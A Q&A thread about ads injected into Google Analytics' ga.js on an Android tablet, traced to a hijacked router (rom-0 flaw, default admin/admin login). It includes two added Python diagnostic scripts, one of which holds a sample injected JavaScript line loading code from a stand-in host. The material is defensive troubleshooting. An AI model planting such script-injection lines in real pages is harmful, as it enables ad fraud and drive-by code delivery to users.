6

A friend of mine just handed me his tablet saying that every time he opens a webpage the browser redirects to several advertisement pages (or, it "adds" advertisements to the page).

This happens both on Chrome and the stock browser.

I used USB debugging to look at the browser requests and I think I found the culprit. When the browser loads http://www.google-analytics.com/ga.js the actual code is different. See this screenshot (the green line is where ga.js should terminate):

[screenshot: the ga.js response shown in DevTools, with a green line marking where the legitimate script ends and the appended code begins]

(and the added code goes on...)

I initially thought that some malware changed the hosts file and assigned a different IP to the google-analytics website, but this is not the case since when I visit the above link directly I see the correct JS code.

How can I track which app is doing this?

William
  • Is there any app managing network traffic like a VPN or proxy? Also try to access the webpages via https (if possible) – GiantTree Feb 22 '15 at 19:55
  • Via HTTPS the problem seems to vanish but I'll make sure and reply – William Feb 22 '15 at 19:57
  • I confirm that via HTTPS the problem vanishes (I tried with reddit.com that allows both HTTP and HTTPS, and via HTTP the page gets redirected). Also, the tablet seems to be pretty clean because the owner tried to clean it before taking it to me: the only apps explicitly installed by him are "Moon+ Reader" and "Mobile Security & Antivirus" (by ESET) – William Feb 22 '15 at 20:20
  • Then there must be something misconfigured. Maybe a proxy that is able to intercept HTTP traffic. – GiantTree Feb 22 '15 at 20:26
  • Following this I can see that no proxy seems to be configured: http://stackoverflow.com/a/21069032/747654, also: the proxy setting seems to be network specific, and the owner had these problems also when connected to his own WiFi... – William Feb 22 '15 at 20:34
  • OK maybe I solved it. I noticed that when the browser asked for ga.js the server response visible from DevTools was actually 304 Not Modified so I thought that maybe when I visited the page directly I would get the right file (but not when asking for ga.js from another page). So I cleared the cache. Now the problem seems to be definitively gone... – William Feb 22 '15 at 20:54
  • Now I wonder: maybe it was a network-related issue (the owner's network fetches the "wrong" ga.js, that will already be cached when connected to my network). But he had tested with his Android cellphone and the issue was not showing. I'll ask him to look again. – William Feb 22 '15 at 21:54
  • Maybe some app before the cleanup. The cache isn't emptied when you uninstall an app. – GiantTree Feb 23 '15 at 00:55
  • I believe this is caused by DNSChanger malware. You might need to reset your router and clear Google Chrome's data and cache to fix it. Take a look at this thread on Google forums: https://productforums.google.com/forum/m/#!topic/chrome/qn1wgcqaFWI – Vinayak Feb 24 '15 at 05:01
  • To test whether you are infected, try running nslookup google-analytics.com from the infected computer (or Android device) and compare the results for the same command run from another computer that you know is clean. Check if both IP addresses are the same. – Vinayak Feb 24 '15 at 05:25
  • Thanks @Vinayak, I'll pass this information to the owner (by the way: your comments might be fit to be moved to an actual answer) – William Feb 24 '15 at 13:32
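The check the question performs by hand (compare the ga.js the browser receives over plain HTTP with a copy that an on-path injector cannot alter) can be automated. The script below is an added example, not code from the question or from any of the answers. It assumes the HTTPS copy of the script is the trusted reference, which matches the observation in the comments that the problem vanishes over HTTPS, and it sends `Cache-Control: no-cache` so the comparison is not defeated by the `304 Not Modified` / stale-cache behaviour noted above. The two script bodies used in the stand-alone run are constructed sample strings, not real ga.js content.

```python
import difflib
import hashlib
import urllib.request

GA_URL_HTTP = "http://www.google-analytics.com/ga.js"
GA_URL_HTTPS = "https://www.google-analytics.com/ga.js"


def fetch_uncached(url, timeout=10):
    """Fetch `url` while asking the browser-side and any intermediate cache for a fresh copy.

    The no-cache request headers avoid the path where a proxy or the device cache
    answers 304 Not Modified and hands back an already-injected copy of the script.
    """
    req = urllib.request.Request(url, headers={
        "Cache-Control": "no-cache",
        "Pragma": "no-cache",
        "User-Agent": "ga-js-injection-check/1.0",  # assumed UA string, any value works
    })
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


def sha256_hex(data):
    """Short fingerprint so two fetches can be compared at a glance."""
    return hashlib.sha256(data).hexdigest()


def injected_segments(reference, observed):
    """Return the text present in `observed` but not in `reference`, as a list of segments.

    `reference` is the script as served over HTTPS, `observed` the same URL over HTTP.
    An empty list means the two copies are byte-for-byte identical.  Appended code
    (the case in the question) comes back as a single trailing segment; code spliced
    into the middle of the file comes back as one segment per insertion.
    """
    if observed == reference:
        return []
    ref_lines = reference.splitlines(keepends=True)
    obs_lines = observed.splitlines(keepends=True)
    matcher = difflib.SequenceMatcher(a=ref_lines, b=obs_lines, autojunk=False)
    segments = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            segments.append("".join(obs_lines[j1:j2]))
    return segments


def verdict(reference, observed):
    """Classify an HTTP copy against the HTTPS reference: 'clean' or 'injected'."""
    return "injected" if injected_segments(reference, observed) else "clean"


# Constructed sample bodies standing in for a clean and a tampered ga.js.
SAMPLE_CLEAN = "(function(){var ga=window.ga||{};ga.ok=1;})();\n"
SAMPLE_INJECTED = SAMPLE_CLEAN + (
    "var s=document.createElement('script');"
    "s.src='http://ads.example/inject.js';document.head.appendChild(s);\n"
)

if __name__ == "__main__":
    # Live mode: compare the two real fetches.  Falls back to the samples when offline.
    try:
        https_body = fetch_uncached(GA_URL_HTTPS).decode("utf-8", errors="replace")
        http_body = fetch_uncached(GA_URL_HTTP).decode("utf-8", errors="replace")
    except OSError as exc:
        print(f"network fetch failed ({exc}); using constructed samples instead")
        https_body, http_body = SAMPLE_CLEAN, SAMPLE_INJECTED
    print("https sha256:", sha256_hex(https_body.encode()))
    print("http  sha256:", sha256_hex(http_body.encode()))
    print("verdict:", verdict(https_body, http_body))
    for seg in injected_segments(https_body, http_body):
        print("--- injected segment ---")
        print(seg.rstrip())
```

Run it from the affected network and again from a network you trust. A differing hash on its own is not proof (a CDN may serve slightly different builds), but an inserted segment that loads a script from an unrelated host is exactly the pattern visible in the screenshot. If the HTTP copy is clean when fetched this way but the browser still shows the appended code, the device is replaying a stale cached copy and clearing the browser cache, as the asker eventually did, is the next step.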

3 Answers

4

I encountered the above situation yesterday. After lots of digging, I got to this thread, and it led me to the solution.

Apparently, one of the computers on the network I visited was exposed to malware that modified the router settings. The router was a D-Link 2760U/E with default Admin / Admin login details.

Using the above credentials, the above malware changed the "static routing tables", adding their servers as a man in the middle. All non-SSL traffic passed through their service, which injected JS into the page. I found a GitHub page that shows the modifications and additions.

It took me a while to understand that all the traffic is coming from a DNS change attack - I have checked and verified that the computer is totally clean and no unknown process / services are running before and while the test.

One of the things they have done is to redirect all google-analytics.com traffic to their server, keeping them under the radar.

So how to resolve it:

Quick way:

Reset your router to factory settings - note it will erase all existing settings.

Long way:

  1. Log in to the router's web UI
  2. Remove all unknown entries from the static routing tables
  3. Change your login password for the router
  4. Reboot your router.

I hope this post will assist someone.

Regards,
Liron

Liron
2

This might be caused by DNSChanger malware but that's dead now so it's possible that it's caused by some other kind of malware that messes with a computer's (or router's) DNS settings. Or maybe the router was exposed to the web (see remote management) and someone was able to hijack it and change its DNS settings.

If the same problem affects all devices (PCs included) connected to the Wi-Fi network, then I guess a router reset is in order in addition to doing a malware scan on all PCs connected to the network. You may use Malwarebytes Anti-Malware for that.

On the Android device, clear Google Chrome's data and cache after the router has been reset and the malware scan is complete. This thread on Google Product Forums might be relevant to the issue.

To test whether or not this is indeed a DNS hijack problem, try running nslookup google-analytics.com from the infected computer (or Android device if BusyBox is installed) and compare the results for the same command run from another computer that you know is clean.

Check if they both return the same IP addresses or in the case of Google, IP addresses controlled by Google. You can verify whether a given IP is Google's or not by doing a WHOIS lookup here: http://whois.domaintools.com/X.X.X.X (x.x.x.x being the IP address)

Vinayak
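The nslookup comparison suggested in this answer can be made less error-prone by parsing the output of both commands and checking every returned address against a list of ranges you trust. The script below is an added example and is not part of the answer. The two nslookup outputs are constructed samples (the suspect answer uses the RFC 5737 documentation address 203.0.113.7, not a real rogue server), and the Google ranges are a small hand-picked subset used only for illustration; for a real check, take the current list from Google's published goog.json (https://www.gstatic.com/ipranges/goog.json) or from WHOIS, as the answer suggests.

```python
import ipaddress
import re

# Constructed sample: `nslookup google-analytics.com` on a host known to be clean.
CLEAN_HOST_OUTPUT = """\
Server:\t\t192.168.0.1
Address:\t192.168.0.1#53

Non-authoritative answer:
Name:\tgoogle-analytics.com
Address: 142.250.185.110
Name:\tgoogle-analytics.com
Address: 2a00:1450:4001:81b::200e
"""

# Constructed sample: the same command behind the suspect router.
SUSPECT_HOST_OUTPUT = """\
Server:\t\t192.168.1.1
Address:\t192.168.1.1#53

Non-authoritative answer:
Name:\tgoogle-analytics.com
Address: 203.0.113.7
"""

# Illustrative subset of Google-operated ranges (assumption for the example;
# replace with the published list or a WHOIS-verified one before relying on it).
GOOGLE_RANGES_EXAMPLE = [ipaddress.ip_network(n) for n in (
    "142.250.0.0/15", "172.217.0.0/16", "216.58.192.0/19", "2a00:1450:4000::/37",
)]

# Matches "Address: x", "Addresses: x" and the bare indented continuation lines
# that Windows nslookup prints for additional answers.
_ADDR_RE = re.compile(r"^\s*(?:Address(?:es)?:\s*)?([0-9A-Fa-f.:]+)\s*$")


def parse_nslookup(output):
    """Return the set of answer addresses from nslookup output (Linux/macOS or Windows style).

    The first paragraph describes the resolver that was queried, so it is skipped;
    only addresses in later paragraphs are answers for the looked-up name.
    """
    paragraphs = re.split(r"\n\s*\n", output.strip())
    answers = set()
    for para in paragraphs[1:]:
        for line in para.splitlines():
            m = _ADDR_RE.match(line)
            if not m:
                continue
            try:
                answers.add(ipaddress.ip_address(m.group(1)))
            except ValueError:
                continue  # not an IP literal (e.g. a hostname line)
    return answers


def compare_answers(clean_output, suspect_output):
    """Split the two answer sets into shared / only-on-clean / only-on-suspect."""
    clean = parse_nslookup(clean_output)
    suspect = parse_nslookup(suspect_output)
    return {
        "shared": clean & suspect,
        "only_on_clean": clean - suspect,
        "only_on_suspect": suspect - clean,
    }


def outside_ranges(ips, networks):
    """Addresses that fall in none of the trusted networks (IPv4/IPv6 handled separately)."""
    return {ip for ip in ips if not any(ip in net for net in networks)}


def diagnose(clean_output, suspect_output, trusted_networks):
    """'consistent', 'differs-but-plausible' or 'dns-hijack-suspected'.

    Google load-balances, so differing answers alone are not proof of tampering;
    an answer outside every trusted range is the signal the answer above describes.
    """
    result = compare_answers(clean_output, suspect_output)
    rogue = outside_ranges(parse_nslookup(suspect_output), trusted_networks)
    if rogue:
        return "dns-hijack-suspected"
    if result["only_on_suspect"] or result["only_on_clean"]:
        return "differs-but-plausible"
    return "consistent"


if __name__ == "__main__":
    res = compare_answers(CLEAN_HOST_OUTPUT, SUSPECT_HOST_OUTPUT)
    print("only on suspect host:", sorted(map(str, res["only_on_suspect"])))
    print("outside trusted ranges:", sorted(map(str, outside_ranges(res["only_on_suspect"], GOOGLE_RANGES_EXAMPLE))))
    print("verdict:", diagnose(CLEAN_HOST_OUTPUT, SUSPECT_HOST_OUTPUT, GOOGLE_RANGES_EXAMPLE))
```

To obtain the inputs, run `nslookup google-analytics.com` on each device and paste the output into the two strings; `nslookup google-analytics.com 8.8.8.8` queries a public resolver directly and is a useful third data point. One caveat that the first answer on this page illustrates: if the router's routing table rather than its DNS setting has been altered, even a direct query to an outside resolver can be redirected, so the "clean" sample should come from a device on a different network, not just a different resolver.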
1

In the end I found out that the router was vulnerable to the rom-0 vulnerability (to test if your router is vulnerable, use this).

So, the issue was most likely caused by someone (or something) who had complete access to the admin interface of the router. I've now updated the firmware (and the test is now negative).

William
  • Where did you find the vulnerability check? How did you check its authenticity? How do you know that there isn't anything going on behind the scenes? There isn't any type of info on the website, except "press the button". A little fishy. – HasH_BrowN Jul 19 '15 at 17:06
  • That checker is mentioned in the paper I cited in the answer (in the paper they explain how to check the vulnerability, and it's reasonable that you can do it with a single button press, since all you need is an IP address) – William Jul 19 '15 at 18:26